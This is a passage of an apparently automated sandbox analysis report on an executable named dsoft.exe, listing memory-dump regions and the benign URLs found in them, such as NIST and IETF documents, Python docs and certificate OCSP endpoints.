Source: dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548674484.0000029488D9E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538385729.0000029488D9A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538354750.0000029488D91000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567353265.0000029488DA0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550535779.000002948963B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2569022192.0000029489645000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550791640.0000029489643000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552508632.0000029488D9E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2687052818.000001FA5CCA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: dsoft.exe, 00000001.00000002.2569758570.00000294897B8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555273691.00000294897D9000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2569188724.000002948966F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2568617414.0000029489480000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534884417.0000029489708000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.0000029489708000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540830985.000002948966D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554770651.000002948970D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2559789819.00000294884AE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551581637.0000029489712000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535580170.0000029489668000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541781590.000002948846D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539552656.0000029488462000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551408444.000002948970C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570912516.000002948A018000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554512563.0000029489788000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2571284642.000002948A350000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2569802443.00000294897E8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552554927.0000029489779000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539842827.0000029488467000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547514499.000002948848E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: dsoft.exe, 00000001.00000002.2571047548.000002948A0E0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015553869.00000294896AA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015553869.0000029489689000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192181460.000001FA5CCDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: dsoft.exe, 00000001.00000002.2570716868.0000029489D80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: dsoft.exe, 00000001.00000002.2570716868.0000029489D80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: dsoft.exe, 00000001.00000002.2568483891.0000029489380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548515712.00000294885B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2558178753.00000294885D5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541850767.00000294885AE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2545891343.00000294885B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555421341.00000294885B0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2568096593.0000029489080000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2558384388.00000294885D8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539453832.0000029488525000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540133201.0000029488535000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2536542831.0000029488519000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539168516.000002948851C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2191490919.000001FA5C1F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: dsoft.exe, 00000001.00000003.2535420058.0000029488DD9000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535331948.0000029488DCC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2682594110.000001FA5C3B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/unittest.html
Source: dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2564132765.0000029488297000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2010187841.000002948828D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552223297.0000029488297000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540098313.0000029488296000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539909753.0000029488247000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548897228.0000029488297000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://github.com/ActiveState/appdirs
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2559002248.0000029488C70000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548674484.0000029488D9E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538385729.0000029488D9A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538354750.0000029488D91000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567353265.0000029488DA0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552508632.0000029488D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: dsoft.exe, 00000001.00000003.2544948231.00000294885F3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2552025454.0000029488604000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535420058.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539322355.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535862130.00000294885ED000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539030193.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547611393.0000029488E36000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554880943.0000029488604000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2251415686.00000294885F0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2684580893.000001FA5CCAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: dsoft.exe, 0000000A.00000003.2168290335.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161F2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2165000044.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161F2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2165000044.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: dsoft.exe, 00000001.00000002.2565795035.0000029488720000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2565697167.0000029488620000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: dsoft.exe, 00000001.00000002.2568096593.0000029489080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/questions/19622133/
Source: dsoft.exe, 00000001.00000002.2567011375.0000029488C74000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2537324099.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2559002248.0000029488C70000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547576461.0000029488C72000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2543552905.0000029488C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: dsoft.exe, 00000001.00000002.2571284642.000002948A398000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2571047548.000002948A1B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: dsoft.exe, 00000001.00000003.2559144725.00000294896EB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554394468.00000294896EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534884417.00000294896C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2569525202.00000294896EB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.00000294896BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535176513.00000294896CB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677159398.000001FA5CD10000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2697557722.000001FA5CD2E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: dsoft.exe, 00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554026491.0000029489853000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570023169.0000029489854000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2680203394.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: dsoft.exe, 00000001.00000002.2565892869.0000029488840000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2705743567.000001FA5BE10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: dsoft.exe, 00000001.00000003.2009384833.0000029488561000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2008873908.0000029488561000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554026491.0000029489853000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554394468.00000294896EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534884417.00000294896C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.00000294896BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535176513.00000294896CB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2570023169.0000029489854000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2693037493.000001FA5CE24000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2677159398.000001FA5CD10000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420158932.000001FA5CE15000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2602033242.000001FA5CE24000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2697557722.000001FA5CD2E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2676039834.000001FA5CCE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: dsoft.exe, 00000001.00000002.2571284642.000002948A398000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.dabeaz.com/ply)
Source: dsoft.exe, 00000001.00000003.2556979506.0000029488A6C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2566160260.0000029488A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dabeaz.com/ply)F
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161F2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2165000044.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: dsoft.exe, 00000001.00000003.2553993965.0000029488E3E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535420058.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539322355.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551311610.0000029488E3D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539030193.0000029488E2C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548013457.0000029488E39000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547611393.0000029488E36000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567642669.0000029488E3E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551278603.0000029488E3A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192239761.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2192500777.000001FA5C324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 